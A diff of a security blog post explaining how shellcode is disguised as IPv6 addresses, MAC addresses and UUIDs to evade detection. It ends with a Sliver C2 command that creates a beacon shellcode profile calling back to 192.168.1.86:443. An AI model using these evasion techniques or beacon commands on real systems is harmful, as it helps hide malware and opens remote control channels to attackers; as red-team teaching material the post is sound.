nirajkharel/nirajkharel.github.io/_posts/2024-04-27-payload-encryption-and-obfuscation.md

 Below is an example which shows how we can use a tool like Supernova to obfuscate the payload.
 <img alt="" class="bf jp jq dj" loading="lazy" role="presentation" src="https://raw.githubusercontent.com/nirajkharel/nirajkharel.github.io/master/assets/img/images/payload-obfuscation-2.png">

-Similar technique can be used on IPv6Fuscation where the shellcodes are grouped into 16 bytes to generated one IPv6 address.
-Again for the detailed explanation, you can navigate to Kylerosario blog.
-Since IPv6 addresses are expressed in hexadecimal, converting it into decimal is not needed.
+A similar technique can be used in IPv6Fuscation, where the shellcode is grouped into 16 bytes to generate one IPv6 address.
+Again, for a detailed explanation, you can refer to Kylerosario's blog.
+Since IPv6 addresses are expressed in hexadecimal, converting them into decimal is not necessary.
 <img alt="" class="bf jp jq dj" loading="lazy" role="presentation" src="https://raw.githubusercontent.com/nirajkharel/nirajkharel.github.io/master/assets/img/images/payload-obfuscation-3.png">

 ### MACFuscation
-MACFuscation consists of the techqniue of converting raw shellcode into MAC addresses `aa:bb:cc:dd:ee:ff`.
+MACFuscation consists of the techqniue for converting raw shellcode into MAC addresses `aa:bb:cc:dd:ee:ff`.
 Each `aa, bb` represents one byte in hexadecimal.
 Since a typical MAC address contains 6 bytes, therefore the shellcode is grouped into 6 bytes and then converted into the MAC addresses.
-If its not the multiple of 6 bytes, padding is used on it.
+If its not the multiple of 6 bytes, padding is used.

-We can use the same tool to convert our shellcode into MAC address.
+We can use the same tool to convert our shellcode into MAC address format.
 <img alt="" class="bf jp jq dj" loading="lazy" role="presentation" src="https://raw.githubusercontent.com/nirajkharel/nirajkharel.github.io/master/assets/img/images/payload-obfuscation-4.png">

 ### UUIDFuscation
 UUIDFuscation is a technique to obfuscate raw shellcode into UUID format `550e8400-e29b-41d4-a716-446655440000`.
 The raw shellcode is grouped into 16 bytes chunks as each UUID represents 16 bytes.
 When the shellcode is not muliple of 16, padding can bse used.
 <img alt="" class="bf jp jq dj" loading="lazy" role="presentation" src="https://raw.githubusercontent.com/nirajkharel/nirajkharel.github.io/master/assets/img/images/payload-obfuscation-5.png">

-Since now we have explored at least 3 types of obfuscation techniques, lets move towards a practical demonstrations.
-But before that one important thing to understand and required is that we need to deobfuscate the payload as well.
-The **deobfuscation** is usually done before allocating the shellcode into virtual memory.
-We will explore one of the technique of **deobfuscation** on the demonstration itself.
+Since we have now explored at least three types of obfuscation techniques, let's move towards a practical demonstration.
+But before that, one important thing to understand is that we need to **deobfuscate** the payload as well.

+**Deobfuscation** is usually done before allocating the shellcode into virtual memory.
+We will explore one of the techniques of **deobfuscation** during the demonstration itself.

 ## Sliver Shellcode Generation
 The first step for the demonstration would be to create a shellcode.
 We will be using **Sliver C2** to create a shellcode and listen for the callback.

 Setting up Sliver C2 is outside of this blog's objective.
 However, you can simply setup the Sliver C2 server and client following the [offical documentation of Sliver](https://sliver.sh/docs?name=Getting+Started).

-Once you have your sliver client ready and up running.
-Create a profile using below command:
+Once you have your sliver client ready and up running, create a profile using below command:
 ```bash
 profiles new beacon --mtls 192.168.1.86:443 --format shellcode shellcode-beacon
 ```